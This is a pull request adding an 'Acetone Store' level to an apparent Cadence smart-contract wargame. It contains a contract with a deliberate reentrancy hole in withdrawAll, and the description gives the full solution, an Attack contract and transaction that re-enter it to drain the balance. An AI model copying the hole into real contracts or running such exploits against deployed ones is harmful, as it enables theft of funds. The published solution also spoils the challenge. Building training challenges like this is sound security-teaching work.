### PR TITLE
add: Acetone Store level

### DIFF
--- a/src/lib/content/flownaut/withdraw-all/en/contract.cdc
+++ b/src/lib/content/flownaut/withdraw-all/en/contract.cdc
@@ -1,0 +1,62 @@
+import AcetoneToken from "./utility/AcetoneToken.cdc"
+import FungibleToken from "./utility/FungibleToken.cdc"
+
+pub contract AcetoneStore {
+   pub var totalBalance: UFix64
+   pub let identityStoragePath: StoragePath
+   pub let vaultStoragePath: StoragePath
+   pub var balances: {Address: UFix64} // Balance per user
+
+   pub fun deposit(address: Address, amount: UFix64) {
+      if let vaultRef = self.account.borrow<&AcetoneToken.Vault>(from: AcetoneStore.vaultStoragePath) {
+         vaultRef.deposit(from: <-AcetoneToken.createVault(balance: amount))
+      } else {
+         panic("Could not borrow reference to the vault")
+      }
+      self.totalBalance = self.totalBalance + amount
+      if let balance = AcetoneStore.balances[address] {
+         self.balances[address] = balance + amount
+      } else {
+         self.balances[address] = amount
+      }
+   }
+
+   access(contract) fun withdrawAll(address: Address, callback: ((): Void)): @AcetoneToken.Vault {
+      pre {
+         self.balances[address] != nil: "Deposit first."
+         self.balances[address]! > UFix64(0.0): "Insufficient balance"
+      }
+      if let vaultRef = self.account.borrow<&AcetoneToken.Vault>(from: self.vaultStoragePath) {
+         let balance = self.balances[address]!
+         AcetoneStore.totalBalance = AcetoneStore.totalBalance - balance
+         let vault <- vaultRef.withdraw(amount: balance)
+         callback()
+         AcetoneStore.balances[address] = 0.0
+         return <-vault
+      } else {
+         panic("Could not borrow reference to the vault")
+      }
+      return <-AcetoneToken.createEmptyVault()
+   }
+
+   pub resource Identity {
+      pub fun withdrawAll(callback: ((): Void)): @AcetoneToken.Vault {
+         return <-AcetoneStore.withdrawAll(address: self.owner!.address, callback: callback)
+      }
+   }
+
+   pub fun createIdentity(): @Identity {
+      return <-create Identity()
+   }
+
+   init() {
+      self.totalBalance = 0.0
+      self.balances = {}
+      self.identityStoragePath = /storage/AcetoneStoreIdentityStorage
+      self.vaultStoragePath = /storage/AcetoneStoreVaultStorage
+      self.account.save(<-AcetoneToken.createEmptyVault(), to: self.vaultStoragePath)
+      self.deposit(address: 0x00, amount: 2.0)
+      self.deposit(address: 0x01, amount: 4.0)
+      self.deposit(address: 0x02, amount: 1.0)
+   }
+}

--- a/src/lib/content/flownaut/withdraw-all/en/overview.ts
+++ b/src/lib/content/flownaut/withdraw-all/en/overview.ts
@@ -1,0 +1,13 @@
+import { DifficultyEnum, type Flownaut } from '$lib/types/content/flownaut.interface';
+
+export const overview: Flownaut = {
+	title: 'Acetone Store',
+	author: {
+		name: 'Jonosuke',
+		socialMediaUrl: 'https://twitter.com/jonosuke2023',
+		avatarUrl: 'https://avatars.githubusercontent.com/u/14267423',
+		isVerified: true
+	},
+	description: `Let's empty the balance!`,
+	difficulty: DifficultyEnum.Intermediate
+};

--- a/src/lib/content/flownaut/withdraw-all/en/readme.md
+++ b/src/lib/content/flownaut/withdraw-all/en/readme.md
@@ -1,0 +1,66 @@
+Reduce the `totalBalance` to zero!
+
+```cadence
+import AcetoneToken from "./utility/AcetoneToken.cdc"
+import FungibleToken from "./utility/FungibleToken.cdc"
+
+pub contract AcetoneStore {
+   pub var totalBalance: UFix64
+   pub let identityStoragePath: StoragePath
+   pub let vaultStoragePath: StoragePath
+   pub var balances: {Address: UFix64} // Balance per user
+
+   pub fun deposit(address: Address, amount: UFix64) {
+      if let vaultRef = self.account.borrow<&AcetoneToken.Vault>(from: AcetoneStore.vaultStoragePath) {
+         vaultRef.deposit(from: <-AcetoneToken.createVault(balance: amount))
+      } else {
+         panic("Could not borrow reference to the vault")
+      }
+      self.totalBalance = self.totalBalance + amount
+      if let balance = AcetoneStore.balances[address] {
+         self.balances[address] = balance + amount
+      } else {
+         self.balances[address] = amount
+      }
+   }
+
+   access(contract) fun withdrawAll(address: Address, callback: ((): Void)): @AcetoneToken.Vault {
+      pre {
+         self.balances[address] != nil: "Deposit first."
+         self.balances[address]! > UFix64(0.0): "Insufficient balance"
+      }
+      if let vaultRef = self.account.borrow<&AcetoneToken.Vault>(from: self.vaultStoragePath) {
+         let balance = self.balances[address]!
+         AcetoneStore.totalBalance = AcetoneStore.totalBalance - balance
+         let vault <- vaultRef.withdraw(amount: balance)
+         callback()
+         AcetoneStore.balances[address] = 0.0
+         return <-vault
+      } else {
+         panic("Could not borrow reference to the vault")
+      }
+      return <-AcetoneToken.createEmptyVault()
+   }
+
+   pub resource Identity {
+      pub fun withdrawAll(callback: ((): Void)): @AcetoneToken.Vault {
+         return <-AcetoneStore.withdrawAll(address: self.owner!.address, callback: callback)
+      }
+   }
+
+   pub fun createIdentity(): @Identity {
+      return <-create Identity()
+   }
+
+   init() {
+      self.totalBalance = 0.0
+      self.balances = {}
+      self.identityStoragePath = /storage/AcetoneStoreIdentityStorage
+      self.vaultStoragePath = /storage/AcetoneStoreVaultStorage
+      self.account.save(<-AcetoneToken.createEmptyVault(), to: self.vaultStoragePath)
+      self.deposit(address: 0x00, amount: 2.0)
+      self.deposit(address: 0x01, amount: 4.0)
+      self.deposit(address: 0x02, amount: 1.0)
+   }
+}
+```

--- a/src/lib/content/flownaut/withdraw-all/en/success.cdc
+++ b/src/lib/content/flownaut/withdraw-all/en/success.cdc
@@ -1,0 +1,5 @@
+import AcetoneStore from "./contract.cdc"
+
+pub fun main(): Bool {
+    return AcetoneStore.totalBalance == 0.0
+}

--- a/src/lib/content/flownaut/withdraw-all/en/utility/AcetoneToken.cdc
+++ b/src/lib/content/flownaut/withdraw-all/en/utility/AcetoneToken.cdc
@@ -1,0 +1,52 @@
+import FungibleToken from "./FungibleToken.cdc"
+
+pub contract AcetoneToken: FungibleToken {
+   pub var totalSupply: UFix64
+   pub event TokensInitialized(initialSupply: UFix64)
+   pub event TokensWithdrawn(amount: UFix64, from: Address?)
+   pub event TokensDeposited(amount: UFix64, to: Address?)
+   pub event TokensMinted(amount: UFix64)
+   pub event TokensBurned(amount: UFix64)
+   pub event MinterCreated(allowedAmount: UFix64)
+   pub event BurnerCreated()
+
+   pub resource Vault: FungibleToken.Provider, FungibleToken.Receiver, FungibleToken.Balance {
+      pub var balance: UFix64
+      pub fun withdraw(amount: UFix64): @Vault {
+         self.balance = self.balance - amount
+         emit TokensWithdrawn(amount: amount, from: self.owner?.address)
+         return <-create Vault(balance: amount)
+      }
+
+      pub fun deposit(from: @FungibleToken.Vault) {
+            let vault <- from as! @AcetoneToken.Vault
+            self.balance = self.balance + vault.balance
+            emit TokensDeposited(amount: vault.balance, to: self.owner?.address)
+            vault.balance = 0.0
+            destroy vault
+      }
+
+      destroy() {
+         if self.balance > 0.0 {
+            AcetoneToken.totalSupply = AcetoneToken.totalSupply - self.balance
+         }
+      }
+
+      init(balance: UFix64) {
+         self.balance = balance
+      }
+   }
+
+   pub fun createEmptyVault(): @Vault {
+      return <-create Vault(balance: 0.0)
+   }
+
+   pub fun createVault(balance: UFix64): @Vault {
+      self.totalSupply = self.totalSupply + balance
+      return <-create Vault(balance: balance)
+   }
+
+   init() {
+      self.totalSupply = 0.0
+   }
+}

--- a/src/lib/content/flownaut/withdraw-all/en/utility/FungibleToken.cdc
+++ b/src/lib/content/flownaut/withdraw-all/en/utility/FungibleToken.cdc
@@ -1,0 +1,237 @@
+/**
+
+# The Flow Fungible Token standard
+
+## `FungibleToken` contract interface
+
+The interface that all Fungible Token contracts would have to conform to.
+If a users wants to deploy a new token contract, their contract
+would need to implement the FungibleToken interface.
+
+Their contract would have to follow all the rules and naming
+that the interface specifies.
+
+## `Vault` resource
+
+Each account that owns tokens would need to have an instance
+of the Vault resource stored in their account storage.
+
+The Vault resource has methods that the owner and other users can call.
+
+## `Provider`, `Receiver`, and `Balance` resource interfaces
+
+These interfaces declare pre-conditions and post-conditions that restrict
+the execution of the functions in the Vault.
+
+They are separate because it gives the user the ability to share
+a reference to their Vault that only exposes the fields functions
+in one or more of the interfaces.
+
+It also gives users the ability to make custom resources that implement
+these interfaces to do various things with the tokens.
+For example, a faucet can be implemented by conforming
+to the Provider interface.
+
+By using resources and interfaces, users of Fungible Token contracts
+can send and receive tokens peer-to-peer, without having to interact
+with a central ledger smart contract. To send tokens to another user,
+a user would simply withdraw the tokens from their Vault, then call
+the deposit function on another user's Vault to complete the transfer.
+
+*/
+
+/// The interface that Fungible Token contracts implement.
+///
+pub contract interface FungibleToken {
+
+    /// The total number of tokens in existence.
+    /// It is up to the implementer to ensure that the total supply
+    /// stays accurate and up to date
+    pub var totalSupply: UFix64
+
+    /// The event that is emitted when the contract is created
+    pub event TokensInitialized(initialSupply: UFix64)
+
+    /// The event that is emitted when tokens are withdrawn from a Vault
+    pub event TokensWithdrawn(amount: UFix64, from: Address?)
+
+    /// The event that is emitted when tokens are deposited into a Vault
+    pub event TokensDeposited(amount: UFix64, to: Address?)
+
+    /// The interface that enforces the requirements for withdrawing
+    /// tokens from the implementing type.
+    ///
+    /// It does not enforce requirements on `balance` here,
+    /// because it leaves open the possibility of creating custom providers
+    /// that do not necessarily need their own balance.
+    ///
+    pub resource interface Provider {
+
+        /// Subtracts tokens from the owner's Vault
+        /// and returns a Vault with the removed tokens.
+        ///
+        /// The function's access level is public, but this is not a problem
+        /// because only the owner storing the resource in their account
+        /// can initially call this function.
+        ///
+        /// The owner may grant other accounts access by creating a private
+        /// capability that allows specific other users to access
+        /// the provider resource through a reference.
+        ///
+        /// The owner may also grant all accounts access by creating a public
+        /// capability that allows all users to access the provider
+        /// resource through a reference.
+        ///
+        /// @param amount: The amount of tokens to be withdrawn from the vault
+        /// @return The Vault resource containing the withdrawn funds
+        /// 
+        pub fun withdraw(amount: UFix64): @Vault {
+            post {
+                // `result` refers to the return value
+                result.balance == amount:
+                    "Withdrawal amount must be the same as the balance of the withdrawn Vault"
+            }
+        }
+    }
+
+    /// The interface that enforces the requirements for depositing
+    /// tokens into the implementing type.
+    ///
+    /// We do not include a condition that checks the balance because
+    /// we want to give users the ability to make custom receivers that
+    /// can do custom things with the tokens, like split them up and
+    /// send them to different places.
+    ///
+    pub resource interface Receiver {
+
+        /// Takes a Vault and deposits it into the implementing resource type
+        ///
+        /// @param from: The Vault resource containing the funds that will be deposited
+        ///
+        pub fun deposit(from: @Vault)
+
+        /// Below is referenced from the FLIP #69 https://github.com/onflow/flips/blob/main/flips/20230206-fungible-token-vault-type-discovery.md
+        /// 
+        /// Returns the dictionary of Vault types that the the receiver is able to accept in its `deposit` method
+        /// this then it would return `{Type<@FlowToken.Vault>(): true}` and if any custom receiver
+        /// uses the default implementation then it would return empty dictionary as its parent
+        /// resource doesn't conform with the `FungibleToken.Vault` resource.
+        ///
+        /// Custom receiver implementations are expected to upgrade their contracts to add an implementation
+        /// that supports this method because it is very valuable for various applications to have.
+        ///
+        /// @return dictionary of supported deposit vault types by the implementing resource.
+        /// 
+        pub fun getSupportedVaultTypes(): {Type: Bool} {
+            // Below check is implemented to make sure that run-time type would
+            // only get returned when the parent resource conforms with `FungibleToken.Vault`. 
+            if self.getType().isSubtype(of: Type<@FungibleToken.Vault>()) {
+                return {self.getType(): true}
+            } else {
+                // Return an empty dictionary as the default value for resource who don't
+                // implement `FungibleToken.Vault`, such as `FungibleTokenSwitchboard`, `TokenForwarder` etc.
+                return {}
+            }
+        }
+    }
+
+    /// The interface that contains the `balance` field of the Vault
+    /// and enforces that when new Vaults are created, the balance
+    /// is initialized correctly.
+    ///
+    pub resource interface Balance {
+
+        /// The total balance of a vault
+        ///
+        pub var balance: UFix64
+
+        init(balance: UFix64) {
+            post {
+                self.balance == balance:
+                    "Balance must be initialized to the initial balance"
+            }
+        }
+
+        /// Function that returns all the Metadata Views implemented by a Fungible Token
+        ///
+        /// @return An array of Types defining the implemented views. This value will be used by
+        ///         developers to know which parameter to pass to the resolveView() method.
+        ///
+        pub fun getViews(): [Type] {
+            return []
+        }
+
+        /// Function that resolves a metadata view for this fungible token by type.
+        ///
+        /// @param view: The Type of the desired view.
+        /// @return A structure representing the requested view.
+        ///
+        pub fun resolveView(_ view: Type): AnyStruct? {
+            return nil
+        }
+    }
+
+    /// The resource that contains the functions to send and receive tokens.
+    /// The declaration of a concrete type in a contract interface means that
+    /// every Fungible Token contract that implements the FungibleToken interface
+    /// must define a concrete `Vault` resource that conforms to the `Provider`, `Receiver`,
+    /// and `Balance` interfaces, and declares their required fields and functions
+    ///
+    pub resource Vault: Provider, Receiver, Balance {
+
+        /// The total balance of the vault
+        pub var balance: UFix64
+
+        // The conforming type must declare an initializer
+        // that allows providing the initial balance of the Vault
+        //
+        init(balance: UFix64)
+
+        /// Subtracts `amount` from the Vault's balance
+        /// and returns a new Vault with the subtracted balance
+        ///
+        /// @param amount: The amount of tokens to be withdrawn from the vault
+        /// @return The Vault resource containing the withdrawn funds
+        ///
+        pub fun withdraw(amount: UFix64): @Vault {
+            pre {
+                self.balance >= amount:
+                    "Amount withdrawn must be less than or equal than the balance of the Vault"
+            }
+            post {
+                // use the special function `before` to get the value of the `balance` field
+                // at the beginning of the function execution
+                //
+                self.balance == before(self.balance) - amount:
+                    "New Vault balance must be the difference of the previous balance and the withdrawn Vault"
+            }
+        }
+
+        /// Takes a Vault and deposits it into the implementing resource type
+        ///
+        /// @param from: The Vault resource containing the funds that will be deposited
+        ///
+        pub fun deposit(from: @Vault) {
+            // Assert that the concrete type of the deposited vault is the same
+            // as the vault that is accepting the deposit
+            pre {
+                from.isInstance(self.getType()): 
+                    "Cannot deposit an incompatible token type"
+            }
+            post {
+                self.balance == before(self.balance) + before(from.balance):
+                    "New Vault balance must be the sum of the previous balance and the deposited Vault"
+            }
+        }
+    }
+
+    /// Allows any user to create a new Vault that has a zero balance
+    ///
+    /// @return The new Vault resource
+    ///
+    pub fun createEmptyVault(): @Vault {
+        post {
+            result.balance == 0.0: "The newly created Vault must have zero balance"
+        }
+    }
+}


### PR DESCRIPTION
AcetoneStore is a reproduction of the reentrancy attack found in Uniswap.

### contract for attack
Attack.cdc
```
import AcetoneStore from "./contract.cdc"

pub contract Attack {
    pub fun attack() {
        if let identityRef = self.account.borrow<&AcetoneStore.Identity>(from: AcetoneStore.identityStoragePath) {
            AcetoneStore.deposit(address: self.account.address, amount: 1.0)
            let vault <- identityRef.withdrawAll(callback: self.callback)
            destroy vault
        } else {
            panic("Could not borrow reference")
        }
    }

    pub fun callback() {
        if AcetoneStore.totalBalance > 0.0 {
            if let identityRef = self.account.borrow<&AcetoneStore.Identity>(from: AcetoneStore.identityStoragePath) {
                let vault <- identityRef.withdrawAll(callback: self.callback)
                destroy vault
            } else {
                panic("Could not borrow reference")
            }
        }
    }

    init() {
        let identity <- AcetoneStore.createIdentity()
        self.account.save(<-identity, to: AcetoneStore.identityStoragePath)
    }
}
```

### transaction
```
import Attack from "./Attack.cdc"

transaction {
    prepare(signer: AuthAccount) {
        Attack.attack()
    }
}
```